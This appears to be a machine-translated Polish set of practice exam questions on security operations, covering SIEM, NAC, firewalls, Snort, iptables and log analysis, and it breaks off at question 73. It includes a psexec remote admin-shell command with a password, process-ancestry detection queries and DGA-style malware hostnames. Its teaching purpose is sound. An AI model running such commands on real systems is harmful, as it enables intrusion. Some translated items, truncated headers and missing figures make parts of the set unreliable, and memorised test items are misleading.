Operacje bezpieczeństwa i monitorowanie
1. James przesyła do VirusTotal plik, który jego zdaniem może stanowić pakiet złośliwego oprogramowania i otrzymuje pozytywne wyniki, ale plik jest identyfikowany pod wieloma różnymi nazwami pakietów złośliwego oprogramowania. Co się najprawdopodobniej wydarzyło?
A. Złośliwe oprogramowanie jest polimorficzne i jest identyfikowane jako wiele wirusów, ponieważ się zmienia.
B. Różne silniki antymalware nazywają ten sam pakiet złośliwego oprogramowania różnymi nazwami.
C. VirusTotal prawdopodobnie błędnie zidentyfikował pakiet złośliwego oprogramowania i jest to fałszywy alarm.
D. Złośliwe oprogramowanie zawiera wiele pakietów złośliwego oprogramowania, co skutkuje dopasowaniami.
2. Isaac chce monitorować wykorzystanie pamięci na żywo w systemie Windows. Jakiego narzędzia powinien użyć, aby zobaczyć zużycie pamięci w graficznym interfejsie użytkownika?
A. MemCheck
B. Monitor wydajności
C. WinMem
D. Góra
3. Abul chce zidentyfikować typowe zachowanie w systemie Windows 10 za pomocą wbudowanego narzędzia do zrozumienia wykorzystania pamięci, procesora i dysku. Jakiego narzędzia może użyć, aby zobaczyć zarówno w czasie rzeczywistym, jak i wydajność przez pewien czas?
A. system
B. sysgraf
C. resmon
D. resgraf
4. Zautomatyzowane narzędzie do analizy złośliwego oprogramowania, którego używa Jose, używa deasemblera i wykonuje porównywanie binarne pomiędzy wieloma plikami binarnymi złośliwego oprogramowania. Jakich informacji szuka narzędzie?
A. Obliczanie minimalnej realnej długości podpisu
B. Binarny odcisk palca w celu zidentyfikowania autora złośliwego oprogramowania
C. Budowanie wykresu podobieństwa podobnych funkcji w plikach binarnych
D. Heurystyczna analiza kodu technik programistycznych
5. W jaki sposób zintegrowana inteligencja jest najczęściej używana w systemie firewall?
A. Zapora wyszukuje nowe adresy IP do zablokowania i tworzy wpis kanału STIX.
B. Kanał informacyjny zawiera reguły zapory, które są implementowane na zaporze w czasie rzeczywistym.
C. Analiza zagrożeń służy do dostarczania informacji o adresach IP dla reguł.
D. Nazwani cyberprzestępcy są blokowani na podstawie ich poziomu zagrożenia i modelu zasobów.
6. Co najprawdopodobniej wskazuje wykonanie wmic.exe, powershell.exe lub winrm.vbs, jeśli odkryjesz, że jeden lub więcej zostało uruchomionych na typowej stacji roboczej użytkownika końcowego?
A. Instalacja aplikacji skryptowej
B. Zdalne wykonanie kodu
C. Dezinstalacja aplikacji za pomocą skryptu
D. Atak dnia zerowego
7. Ben przegląda dzienniki ruchu sieciowego i zauważa ruch HTTP i HTTPS pochodzący ze stacji roboczej. Na jakie porty TCP powinien się spodziewać, że ten ruch zostanie wysłany w większości normalnych okoliczności?
A. 80 i 443
B. 22 i 80
C. 80 i 8088
D. 22 i 443
Użyj tego scenariusza do pytań 8-10. Lucy jest operatorem SOC w swojej organizacji i jest odpowiedzialna za monitorowanie jej organizacji SIEM i inne urządzenia zabezpieczające. Jej organizacja posiada oddziały zarówno krajowe, jak i międzynarodowe, a wielu jej pracowników często podróżuje.
8. Podczas gdy Lucy monitoruje SIEM, zauważa, że wszystkie źródła dzienników z nowojorskiego oddziału jej organizacji przestały raportować przez ostatnie 24 godziny. Jakie reguły wykrywania lub alerty powinna skonfigurować, aby wcześniej się o tym dowiedziała następnym razem?
A. Heurystyka
B. Zachowanie
C. Dostępność
D. Anomalia
9. Po odkryciu w poprzednim pytaniu Lucy ma za zadanie skonfigurować alerty wysyłane do administratorów systemu. Tworzy regułę, którą można przedstawić w pseudokodzie w następujący sposób: Wysyłaj alert SMS co 30 sekund, gdy systemy nie wysyłają dzienników przez ponad 1 minutę. Przeciętny administrator w organizacji Lucy odpowiada za 150-300 komputerów. Jakie niebezpieczeństwo stwarza alarm Lucy?
A. DDoS, który powoduje, że administratorzy nie mają dostępu do systemów
B. Awaria sieci
C. Administratorzy mogą ignorować lub filtrować alerty
D. Skok pamięci
10. Lucy konfiguruje alert, który wykrywa, kiedy użytkownicy, którzy zazwyczaj nie podróżują, logują się z innych krajów. Jaki to rodzaj analizy?
A. Trend
B. Dostępność
C. Heurystyka
D. Zachowanie
11. Wyłączenie zbędnych usług jest przykładem jakiego rodzaju aktywności?
A. Modelowanie zagrożeń
B. Naprawa incydentów
C. Proaktywna ocena ryzyka
D. Zmniejszenie powierzchni ataku zagrożenia
12. Suki zauważa ruch przychodzący do systemu Windows na porcie TCP 3389 w jej sieci firmowej. Jaki rodzaj ruchu najprawdopodobniej widzi?
A. Udział plików NetBIOS
B. Połączenie RADIUS
C. Połączenie RDP
D. Połączenie Kerberos
13. Angela chce zapobiec atakom przepełnienia bufora w systemie Windows. Jakie dwie wbudowane technologie powinna rozważyć?
A. Zapora pamięci i osłona stosu
B. ASLR i DEP
C. ASLR i DLP
D. Zapora pamięci i osłona bufora
14. Isaac przegląda zabezpieczenia sieci w organizacji i odkrywa, że zabezpieczenia portów zostały włączone w celu kontrolowania, które systemy mogą łączyć się z portami sieciowymi. Którą z poniższych technologii powinien zamiast tego polecić, aby uniknąć słabych punktów, które ma zabezpieczenia portów w swoim modelu zabezpieczeń?
802.1x
B. DMARC
C. SPF
D. 802.3
15. Ian chce przechwycić informacje o atakach na eskalację uprawnień w systemie Linux. Jeśli uważa, że osoba poufna wykorzysta lukę, która pozwala mu na użycie sudo do przejęcia uprawnień administratora, gdzie najprawdopodobniej znajdzie informacje w dzienniku dotyczące tego, co się wydarzyło?
A. Akta sudoers
B. /var/log/sudo
C. /var/log/auth.log
D. .bash_log roota
16. Kiedy Pete łączy się z siecią swojej organizacji, jego komputer PC uruchamia oprogramowanie NAC, które zainstalował jego administrator systemu. Oprogramowanie komunikuje się z przełącznikiem brzegowym, do którego jest podłączony, co weryfikuje jego logowanie i stan bezpieczeństwa systemu. Jakiego typu rozwiązania NAC używa Pete?
A. Oparte na agentach, w paśmie
B. Bez agenta, w paśmie
C. Oparte na agentach, poza pasmem
D. Bez agenta, poza pasmem
17. Jaki typ informacji może określić Gabby z dzienników Tripwire w systemie Linux, jeśli jest skonfigurowany do monitorowania katalogu?
A. Jak często katalog jest otwierany?
B. Jeśli pliki w katalogu uległy zmianie
C. Jeśli poufne dane zostały skopiowane z katalogu
D. Kto przeglądał pliki w katalogu?
18. Przeglądając systemy, za które jest odpowiedzialna, Charlene odkrywa, że użytkownik niedawno uruchomił następujące polecenie w oknie konsoli Windows. Co się stało? psexec \\10.0.11.1 -u Administrator -p przykładpw cmd.exe
A. Użytkownik otworzył wiersz poleceń na swojej stacji roboczej.
B. Użytkownik otworzył wiersz poleceń na pulpicie zdalnej stacji roboczej.
C. Użytkownik otworzył interaktywny wiersz poleceń jako administrator na zdalnej stacji roboczej.
D. Użytkownik otworzył wiersz poleceń na swojej stacji roboczej jako Administrator.
19. Brian pisze regułę Snort, która brzmi
Alert tcp any -> 10.10.11.0/24 3306
Jaki rodzaj ruchu wykryje?
A. Ruch MySQL
B. Ruch RDP
C. Ruch LDAP
D. Ruch BGP
20. Jaka technologia śledzi zachowania użytkowników i podmiotów końcowych, centralizuje te dane oraz inne dane dotyczące bezpieczeństwa, a następnie wykorzystuje modele statystyczne do wykrywania nietypowych zachowań i powiadamiania administratorów?
A. IPS
B. UEBA
C. IDS
D. DMARC
21. Sadiq chce wdrożyć IPS w lokalizacji sieciowej, która zmaksymalizuje jego wpływ, jednocześnie unikając niepotrzebnego obciążenia. Jeśli chce umieścić go w pobliżu granicy sieci pokazanej na poniższym obrazku, gdzie powinien go umieścić?
A. Punkt A
B. Punkt B
C. Punkt C
D. Punkt D
22. Podczas przeglądania danych tcpdump Kwame odkrywa, że setki różnych adresów IP wysyłają stały strumień pakietów SYN do serwera w jego sieci. Co się dzieje Kwame powinien być zaniepokojony?
A. Zapora blokuje połączenia przed wystąpieniem
B. IPS blokuje połączenia przed wystąpieniem
C. Powódź SYN
D. Blokada ACK
23. Podczas przeglądania dzienników zdarzeń Windows dla systemu Windows 10 z zgłoszonym dziwnym zachowaniem, Kai odkrywa, że system, który przegląda, pokazuje Identyfikator zdarzenia 1005 MALWAREPROTECTION_SCAN_FAILED codziennie o tej samej godzinie. Jaka jest najbardziej prawdopodobna przyczyna tego problemu?
A. System został zamknięty.
B. Inny program antywirusowy zakłócił skanowanie.
C. Użytkownik wyłączył skanowanie.
D. Skanowanie znalazło plik, którego nie można było przeskanować.
24. Charles chce użyć swojego SIEM do automatycznego oznaczania znanych złych adresów IP. Która z poniższych funkcji nie jest zwykle używana w przypadku urządzeń SIEM?
A. Czarna lista
B. Reputacja IP
C. Biała lista
D. Reputacja domeny
25. Gabby wykonuje następujące polecenie. Co ona robi? ps-aux | grep Apache2 | grep root
A. Wyszukiwanie wszystkich plików należących do administratora o nazwie apache2
B. Sprawdzanie aktualnie uruchomionych procesów ze słowem apache2 i rootem, które pojawiają się na wyjściu top
C. Zamykanie wszystkich procesów Apache2 uruchamianych przez roota
D. Nie ma wystarczających informacji, aby odpowiedzieć na to pytanie.
26. Przeglądając nagłówki wiadomości e-mail, Saanvi zauważa wpis, który brzmi:
Od: "John Smith, CIO"
A. E-mail Johna Smitha został przekazany przez kogoś z demo.com.
B. E-mail Johna Smitha został wysłany do kogoś na demo.com.
C. Nagłówki zostały sfałszowane, aby wyglądały, jakby pochodziły od Johna Smitha.
D. Serwer mail.demo.com to zaufany partner w zakresie przekazywania poczty e-mail, na przykład example.com.
27. Corbin chce uniemożliwić atakującym obejście zabezpieczeń portów na urządzeniach brzegowych swojej sieci. Jakiej techniki atakujący najczęściej używają, aby ją ominąć?
A. Fałszowanie adresów MAC
B. Podanie ważnych danych uwierzytelniających
C. Podszywanie się pod adresy IP
D. Podanie fałszywych danych uwierzytelniających
28. Fiona chce zapobiec podszywaniu się pod inne osoby w jej firmie za pośrednictwem poczty elektronicznej. Jaka technologia może temu zapobiec?
A. IMAP
B. SPF
C. DKIM
D. DMARC
29. Która z pozycji z poniższej listy zazwyczaj nie znajduje się w nagłówku wiadomości e-mail?
A. Adres IP nadawcy
B. Data
C. Adres IP odbiorcy
D. Klucz prywatny
Pytania 30-32 odnoszą się do następującego scenariusza:
Chris rozwiązuje problem z bazą reguł zapory, która pojawia się tutaj:
30. Użytkownicy zgłaszają, że poczta przychodząca nie dociera do ich kont. Chris uważa, że zasada 1 powinna zapewniać ten dostęp. Serwer SMTP organizacji znajduje się pod adresem 10.15.1.1. Jaki element tej reguły jest nieprawidłowy?
A. Protokół
B. Port źródłowy
C. Docelowy adres IP
D. Port docelowy
31. Twórcy reguł zapory zamierzali blokować dostęp do witryny hostowanej pod adresem 10.15.1.2 z wyjątkiem hostów znajdujących się w podsieci 10.20.0.0/16. Jednak użytkownicy w tej podsieci zgłaszają, że nie mogą uzyskać dostępu do witryny. Co jest nie tak?
A. Protokół jest nieprawidłowy.
B. Zasady są niewłaściwie uporządkowane.
C. Nie określono portu źródłowego.
D. W regule nie ma błędu i Chris powinien sprawdzić, czy nie ma innych problemów.
32. Reguła 4 ma na celu umożliwienie dostępu SSH z sieci zewnętrznych do serwera znajdującego się pod adresem 10.15.1.3. Użytkownicy zgłaszają, że nie mogą uzyskać dostępu do serwera. Co jest nie tak?
A. Protokół jest nieprawidłowy.
B. Zasady są niewłaściwie uporządkowane.
C. Port docelowy jest nieprawidłowy.
D. W regule nie ma błędu i Chris powinien sprawdzić, czy nie ma innych problemów.
33. Amanda została wyznaczona do zmniejszenia powierzchni ataku w jej organizacji i wie, że obecny projekt sieci opiera się na umożliwieniu systemom w całej jej organizacji bezpośredniego dostępu do Internetu za pośrednictwem publicznych adresów IP, które zostały im przypisane. Jaki powinien być jej pierwszy krok, aby szybko i bez poświęcania dużej ilości czasu zmniejszyć powierzchnię ataku swojej organizacji?
A. Zainstaluj zapory hosta w systemach
B. Przejdź do środowiska NAT
C. Zainstaluj IPS
D. Żadne z powyższych
34. Ramy ATT&CK określają, które z poniższych są "specyfiką tego, w jaki sposób przeciwnik zaatakowałby cel"?
A. Aktor groźby
B. Metoda kierowania
C. Wektor ataku
D. Słabość organizacyjna
35. Manish używa systemu NAC i chce umożliwić użytkownikom, którzy nie spełniają wymagań wstępnych, łatanie swoich maszyn. Jakiej techniki powinien użyć, aby na to pozwolić?
A. Odmów dostępu do sieci i wymagaj od użytkowników łączenia się z inną siecią w celu zainstalowania poprawek przed ponownym połączeniem
B. Zbuduj sieć kwarantanny, która umożliwia dostęp do witryn i narzędzi aktualizacji
C. Odmów wszelkiego dostępu i skontaktuj się z pomocą techniczną, aby zaktualizować system
D. Zezwól na dostęp i wymuś ponowne uruchomienie po aktualizacji
36. Lisa zdaje sobie sprawę, że wielu członków jej organizacji padło ofiarą ataku phishingowego. Jakim wektorem ataku powinna się na tej podstawie martwić?
A. Naruszone dane uwierzytelniające
B. Złośliwi wtajemniczeni
C. Oprogramowanie ransomware
D. Brutalna siła
37. Matt uważa, że programiści w jego organizacji wdrożyli kod, który nie implementował plików cookie w bezpieczny sposób. Jaki rodzaj ataku byłby wspomagany przez ten problem bezpieczeństwa?
A. Wstrzyknięcie SQL
B. Atak typu "odmowa usługi"
C. Przejmowanie sesji
D. XSS
38. Jaki rodzaj ataku ma ograniczać lub zapobiegać algorytm wycofywania?
A. Ataki typu "odmowa usługi"
B. Ataki siłowe
C. Zhakowane ataki oparte na poświadczeniach
D. trojany
39. Ian chce wykorzystać wiele przepływów zagrożeń i wie, że pomocne byłoby użycie ustandaryzowanego formatu informacji o zagrożeniach. Jakich standardów informacji o zagrożeniach powinien szukać od swoich dostawców kanałów, aby zmaksymalizować zgodność między swoimi źródłami informacji?
A. STIX i TAXII
B. SAML i OCSP
C. STIX i CAB
D. SAML i TAXII
40. Cassandra dokumentuje aktora-zagrożenia przy użyciu standardu STIX 2.0 i opisuje aktora-zagrożenia jako chcącego ukraść dane z badań nuklearnych. Jaki rodzaj etykiety otrzymałoby to w taksonomii STIX?
A. Alias
B. Cel
C. Ich wyrafinowanie
D. Ich poziom zasobów
41. Jamal chce wykorzystać ramy, aby usprawnić polowanie na zagrożenia w celu ochrony sieci. Czy powinien wybrać ramy polowania na zagrożenia, które pomogą zespołowi skuteczniej kategoryzować i analizować zagrożenia?
A. MOPAR
B. CVSS
C. UKOśNE ATT&CK
D. CAPEC
42. Alex musi wdrożyć rozwiązanie, które ograniczy dostęp do jego sieci tylko do upoważnionych osób, zapewniając jednocześnie, że systemy łączące się z siecią spełniają wymagania jego organizacji dotyczące instalowania poprawek, ochrony antywirusowej i konfiguracji. Która z poniższych technologii najlepiej spełni te wymagania?
A. Biała lista
B. Bezpieczeństwo portu
C. NAC
D. EAP
43. Podczas przeglądu dziennika Mei widzi powtarzające się wpisy zapory, jak pokazano tutaj:
16 września 2019 23:01:37: %ASA-4-106023: Odmów tcp src
na zewnątrz:10.10.0.100/53534 czas od wewnątrz:192.168.1.128/1521 by
grupa dostępu "NA ZEWNĄTRZ" [0x5063b82f, 0x0]
16 września 2019 23:01:38: %ASA-4-106023: Odmów tcp src
na zewnątrz:10.10.0.100/53534 czas od wewnątrz:192.168.1.128/1521 by
grupa dostępu "NA ZEWNĄTRZ" [0x5063b82f, 0x0]
16 września 2019 23:01:39: %ASA-4-106023: Odmów tcp src
na zewnątrz:10.10.0.100/53534 czas od wewnątrz:192.168.1.128/1521 by
grupa dostępu "NA ZEWNĄTRZ" [0x5063b82f, 0x0]
16 września 2019 23:01:40: %ASA-4-106023: Odmów tcp src
na zewnątrz:10.10.0.100/53534 czas od wewnątrz:192.168.1.128/1521 by
grupa dostępu "NA ZEWNĄTRZ" [0x5063b82f, 0x0]
Do jakiej usługi zdalny system najprawdopodobniej próbuje uzyskać dostęp?
A.H.323
B. SNMP
C. MS-SQL
D. ORACLE
44. Podczas analizy wykrytego przez nią pliku złośliwego oprogramowania Tracy znajduje zakodowany plik, który jej zdaniem jest podstawowym plikiem binarnym w pakiecie złośliwego oprogramowania. Które z poniższych nie jest rodzajem narzędzia, którego twórcy złośliwego oprogramowania mogli użyć do zaciemnienia kodu?
A. Pakowacz
B. krypter
C. Tasownik
D. Opiekun
45. Przeglądając logi Apache, Nara widzi następujące wpisy oraz setki innych z tego samego źródłowego adresu IP. Co powinno się zgłosić Nara?
[ 21/Jul/2019:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php"
"-" 302 336 0
[ 21/lip/2019:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302
336 0
[ 21/Jul/2019:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-"
302 336 0
[ 21/Jul/2019:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-"
302 336 0
[ 21/Jul/2019:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-"
302 336 0
[ 21/lip/2019:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php"
"-" 302 336 0
A. Atak typu "odmowa usługi"
B. Skan podatności
C. Skanowanie portu
D. Atak z przechodzeniem katalogów
46. Andrea musi dodać regułę zapory sieciowej, która uniemożliwi zewnętrznym napastnikom przeprowadzenie w jej sieci rekonesansu w celu zebrania topologii. Gdzie na poniższym obrazku powinna dodać regułę mającą blokować ten rodzaj ruchu?
A. Zapora sieciowa
B. Router
C. Przełącznik dystrybucji
D. Serwer Windows 2019
47. Snort IPS skonfigurowany przez Adama zawiera regułę, która odczytuje alert tcp $EXTERNAL_NET any -> 10.0.10.0/24 80
(msg:"Alert!"; content:"http|3a|//www.example.com/download.php"; nocase;offset:12; classtype: web-application-activity;sid:5555555; rev:1; )
Jakiej metody wykrywania używa Adam?
A. Na podstawie anomalii
B. Oparte na trendach
C. Na podstawie dostępności
D. Behawioralne
48. System, za który odpowiada Carlos, doświadcza konsekwentnych ataków typu "odmowa usługi" przy użyciu wersji Low Orbit Ion Cannon (LOIC), która wykorzystuje komputery osobiste w skoordynowanym ataku, wysyłając duże ilości ruchu z każdego systemu w celu zalania systemu. serwer, co uniemożliwia mu odpowiadanie na uzasadnione żądania. Jakiego typu reguły zapory powinien użyć Carlos, aby ograniczyć wpływ takiego narzędzia, jeśli zużycie przepustowości przez sam atak nie jest głównym problemem?
A. Czarna lista oparta na adresach IP
B. Porzucanie wszystkich pakietów SYN
C. Korzystanie z szybkości połączenia lub filtra ograniczającego głośność na adres IP
D. Korzystanie z filtra blokującego trasy, który analizuje wspólne trasy LOIC
49. Eleanor wykorzystuje obserwowane poziomy aktywności US-CERT NCISS do oceny aktywności podmiotów stanowiących zagrożenie. Jeśli ma systemy z aktywnymi infekcjami ransomware, które mają zaszyfrowane dane w systemach, ale systemy mają dostępne i bezpieczne kopie zapasowe, na jakim poziomie powinna ocenić zaobserwowaną aktywność?
A. Przygotuj się
B. Zaangażuj
C. Obecność
D. Efekt
50. Cormac musi zablokować stację roboczą Windows, która została niedawno zeskanowana za pomocą nmap w systemie opartym na Kali Linux, a wyniki są pokazane tutaj. Wie, że stacja robocza musi mieć dostęp do stron internetowych i że system jest częścią domeny Windows. Jakie porty powinien przepuszczać przez zaporę systemu dla połączeń inicjowanych zewnętrznie?
A. 80, 135, 139 i 445
B. 80, 445 i 3389
C. 135, 139 i 445
D. Żadne porty nie powinny być otwarte
51. Zespół Franka używa następującego zapytania, aby zidentyfikować zdarzenia w swoim narzędziu do analizy zagrożeń. Dlaczego ten scenariusz miałby niepokoić zespół ds. bezpieczeństwa? wybierz * z zdarzeń sieciowych, gdzie data.process.image.file = 'cmd.exe' AND data.process.parentImage.file != 'explorer.exe' AND data.process. akcja = "uruchom"
A. Procesy inne niż explorer.exe zazwyczaj nie uruchamiają wierszy poleceń.
B. cmd.exe nigdy nie powinien uruchamiać programu explorer.exe.
C. explorer.exe zapewnia dostęp administracyjny do systemów.
D. cmd.exe uruchamia się domyślnie jako administrator po uruchomieniu poza Eksploratorem.
52. Podczas konfigurowania przez firmę Cormac zasad kontroli dostępu do sieci w swojej organizacji, konfiguruje on reguły systemu operacyjnego klienta, które zawierają następujące stwierdzenia:
ALLOW na wersję Windows 7 *, wersję Windows 10 *
ALLOW na wersję OSX *
ALLOW iOS 8.1, wersja iOS 9 *
ALLOW na Androida 7.*
Po wdrożeniu tej reguły odkrywa, że wiele urządzeń w jego sieci nie może się połączyć. Jaki problem najprawdopodobniej występuje?
A. Niepewni klienci
B. Nieprawidłowe wersje klienta NAC
C. Niezgodność wersji systemu operacyjnego
D. Niezgodność poziomu poprawki
53. Henry konfiguruje urządzenie zabezpieczające zapory nowej generacji (NGFW), aby fałszować odpowiedzi DNS dla znanych złośliwych domen. Powoduje to, że użytkownicy, którzy próbują odwiedzić witryny hostowane przez te domeny, zobaczą stronę docelową kontrolowaną przez Henry′ego, która informuje ich, że uniemożliwiono im odwiedzenie złośliwej witryny. Jak nazywa się ta technika?
A. maskarada DNS
B. Zapadanie się DNS
C. Ponowne sekwencjonowanie DNS
D. Rewizja hierarchii DNS
54. Maria jest administratorem domeny Active Directory w swojej firmie i wie, że szybko rozprzestrzeniający się botnet opiera się na szeregu nazw domen służących do zarządzania i kontroli oraz że uniemożliwienie dostępu do tych nazw domen spowoduje infekcję złośliwym oprogramowaniem, które łączy się z botnet nie podejmie dalszych działań. Które z poniższych działań jest dla niej najlepszą opcją, jeśli chce uniemożliwić użytkownikom systemu Windows spoza lokalizacji łączenie się z systemami dowodzenia i kontroli botnetu?
A. Wymuś aktualizację BGP
B. Skonfiguruj lej DNS
C. Zmodyfikuj plik hosts
D. Zainstaluj aplikację antymalware
55. Analizując pakiet złośliwego oprogramowania, Ryan znajduje tutaj listę nazw hostów:
poważanierealsitetest.com
rvcxestnessrealsitetest.com
hjbtestnessrealsitetest.com
agekestnessrealsitetest.com
sgjxestnessrealsitetest.com
igjyestnessrealsitetest.com
zxahestnessrealsitetest.com
zfrpestnessrealsitetest.com
hdquestnessrealsitetest.com
umcuestnessrealsitetest.com
hrbyestnessrealsitetest.com
ysrtestnessrealsitetest.com
kgteestnessrealsitetest.com
hfsnestnessrealsitetest.com
njxfestnessrealsitetest.com
Co prawdopodobnie znalazł w pakiecie złośliwego oprogramowania?
A. RPG
B. DGA
C. SPT
D. FIN
56. Marek pisze skrypt, który pobiera dane ze swojego repozytorium danych bezpieczeństwa. Skrypt zawiera następujące zapytanie:
wybierz source.name, data.process.cmd, count(*) AS hostcount
z windows-events, gdzie type = 'sysmon' AND
data.process.action = 'uruchom' ORAZ data.process. obraz.plik =
"reg.exe" ORAZ data.process.parentImage.file = "cmd.exe"
Następnie wysyła zapytanie do zwróconych danych za pomocą następującego skryptu:
wybierz source.name, data.process.cmd, count(*) AS hostcount
z zdarzeń sieciowych, gdzie type = 'sysmon' AND
data.process.action = 'uruchom' ORAZ data.process. obraz.plik =
"cmd.exe" ORAZ data.process.parentImage.file = "explorer.exe"
Jakie wydarzenia zobaczy Mark?
A. Używa explorer.exe, gdzie jest uruchamiany przez cmd.exe
B. Edycje rejestru uruchamiane za pomocą wiersza poleceń z Eksploratora
C. Edycje rejestru uruchomione przez explorer.exe, które modyfikują cmd.exe
D. Używa cmd.exe, gdy jest uruchamiany przez reg.exe
57. Chris obsługuje sieć punktów sprzedaży (POS) dla firmy, która akceptuje karty kredytowe i dlatego musi być zgodna z PCI DSS. Podczas swojej regularnej oceny terminali POS odkrywa, że na każdym z nich istnieje luka w zabezpieczeniach systemu operacyjnego Windows. Ponieważ wszystkie są systemami wbudowanymi, które wymagają aktualizacji producenta, wie, że nie może zainstalować dostępnej poprawki. Jaka jest najlepsza opcja Chrisa, aby zachować zgodność z PCI DSS i chronić swoje podatne na ataki systemy?
A. Zastąp wbudowane terminale punktów sprzedaży w systemie Windows standardowymi systemami Windows
B. Zbuduj niestandardowy obraz systemu operacyjnego, który zawiera poprawkę
C. Identyfikuj, wdrażaj i udokumentuj kontrole kompensacyjne
D. Usuń terminale POS z sieci, dopóki sprzedawca nie wyda poprawki
58. Mateo jest odpowiedzialny za wzmacnianie systemów w swojej sieci i odkrywa, że wiele urządzeń sieciowych ma ujawnione usługi, w tym telnet, FTP i serwery WWW. Jaka jest jego najlepsza opcja zabezpieczenia tych systemów?
A. Włącz zapory hosta
B. Zainstaluj poprawki dla tych usług
C. Wyłącz usługi dla każdego urządzenia
D. Umieść zaporę sieciową między urządzeniami a resztą sieci
59. Michelle uruchamia następującą komendę grep. Jaki tekst będzie pasował?
grep -i przykład *.txt
A. Wszystkie pliki tekstowe w bieżącym katalogu zawierające przykład słowa
B. Wszystkie wystąpienia przykładu tekstowego we wszystkich plikach w bieżącym katalogu z rozszerzeniem .txt
C. Wszystkie wystąpienia przykładowego tekstu małymi literami we wszystkich plikach w bieżącym katalogu z rozszerzeniem .txt
D. Wszystkie pliki TXT z nazwą pliku, w tym przykład słowa w bieżącym katalogu i wszystkich podkatalogach
60. Pranab wdraża mechanizmy kontroli kryptograficznej, aby chronić swoją organizację i chciałby użyć dogłębnych mechanizmów ochrony, aby chronić poufne informacje przechowywane i przesyłane przez serwer sieciowy. Która z poniższych kontroli byłaby najmniej odpowiednia do bezpośredniego zapewnienia tej ochrony?
A. TLS
B. VPN
C. DLP
D. FDE
61. Deepa chce zobaczyć wykorzystanie pamięci dla wielu procesów Linuksa jednocześnie. Jakie polecenie powinna wydać?
A. top
B. ls-mem
C. mem
D. memstat
62. Tracy sprawdza poprawność zabezpieczeń aplikacji internetowych stosowanych przez jej organizację. Chce upewnić się, że organizacja jest przygotowana do prowadzenia dochodzeń kryminalistycznych dotyczących przyszłych incydentów bezpieczeństwa. Która z poniższych kategorii kontroli OWASP najprawdopodobniej przyczyni się do tego wysiłku?
A. Rejestrowanie implementacji
B. Sprawdź poprawność wszystkich danych wejściowych
C. Sparametryzuj zapytania
D. Obsługa błędów i wyjątków
63. Latisha chce mieć pewność, że stacje robocze BYOD, które łączą się z jej siecią, spełniają określone minimalne wymagania dotyczące poziomu poprawek systemu operacyjnego. Chce również umieścić je w odpowiedniej sieci VLAN dla grupy użytkowników, do której należy zalogowany użytkownik. Wdraża swoje rozwiązanie w istniejącej, złożonej sieci. Jakie rozwiązanie powinna polecić?
A. Oparta na agentach, in-line NAC
B. Bez agenta, wbudowany NAC
C. Oparta na agencie, poza pasmem NAC
D. Bez agenta, poza pasmem NAC
64. Organizacja Kaitlyn niedawno ustanowiła nową politykę haseł, która wymaga, aby wszystkie hasła miały minimalną długość 10 znaków i spełniały pewne wymagania dotyczące złożoności. Chciałaby wymusić ten wymóg w systemach Windows w swojej domenie. Jaki rodzaj kontroli najłatwiej na to pozwoli?
A. Obiekt zasad grupy
B. Jednostka organizacyjna
C. Las Active Directory
D. Kontroler domeny
65. Eric chce wysłać wiadomość e-mail przy użyciu podpisu cyfrowego, aby upewnić się, że odbiorca może udowodnić, że wiadomość została przez niego wysłana i że treść nie uległa zmianie. Jaka technologia jest często używana do tego?
A. S/MIME
B. IMAP
C. DKIM
D. TLS
66. Cameron musi skonfigurować zestaw reguł zapory opartej na Linux iptables, aby uniemożliwić dostęp z hostów A i B, jednocześnie zezwalając na ruch SMTP z hosta C; który zestaw poleceń to umożliwi?
A. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW
C. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW
# iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP
D. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP
# iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP
# iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW
67. Angela chce blokować ruch wysyłany do podejrzanego złośliwego hosta. Jakiego wpisu reguły iptables może użyć do zablokowania ruchu do hosta o adresie IP 10.24.31.11?
A. iptables -A WYJŚCIE -d 10.24.31.11 -j DROP
B. iptables -A INPUT -d 10.24.31.11 -j ADD
C. iptables -block -host 10.24.31.11 -j DROP
D. iptables -block -ip 10.24.31.11 -j ADD
Skorzystaj z poniższego scenariusza i obrazu, aby odpowiedzieć na pytania 68-70. Przeglądając system, za który jest odpowiedzialna, Amanda zauważa, że system działa słabo i uruchamia htop, aby zobaczyć graficzną reprezentację wykorzystania zasobów systemowych. Widzi informacje pokazane na poniższym obrazku:
68. Jaki problem Amanda powinna zgłosić administratorowi systemu?
A. Wysokie wykorzystanie sieci
B. Wysokie wykorzystanie pamięci
C. Niewystarczająca przestrzeń wymiany
D. Wysokie wykorzystanie procesora
69. Jakie polecenie mogłaby uruchomić Amanda, aby znaleźć proces o najwyższym wykorzystaniu procesora, gdyby nie miała dostępu do htop?
A. ps
B. top
C. proc
D. load
70. Jakiego polecenia Amanda może użyć do zakończenia procesu?
A. term
B. stop
C. end
D. kill
71. Jakiego rodzaju ataku musi być świadomy administrator sieci podczas wdrażania zabezpieczeń portów?
A. Podszywanie się pod adres MAC
B. Podszywanie się pod adres IP
C. Ataki typu "odmowa usługi"
D. Spoofing ARP
72. Piper chce zatrzymać cały ruch przed dotarciem lub wyjściem z systemu Linux z zaporą sieciową iptables. Które z poniższych poleceń nie jest jednym z trzech poleceń iptables potrzebnych do wykonania tej akcji?
A. #iptables-policy INPUT DROP
B. #iptables-policy SERVICE DROP
C. #iptables-policy OUTPUT DROP
D. #iptables-policy FORWARD DROP
73. Syd wprowadza następujące polecenie w systemie Linux:
#echo 127.0.0.1 example.com >> /etc/hosts
Co ona zrobiła?
A. Dodała system do pliku dozwolonych hostów.
B. Skierowała ruch z domeny example.com do hosta lokalnego.
C. Skierowała ruch lokalnego hosta na example.com.
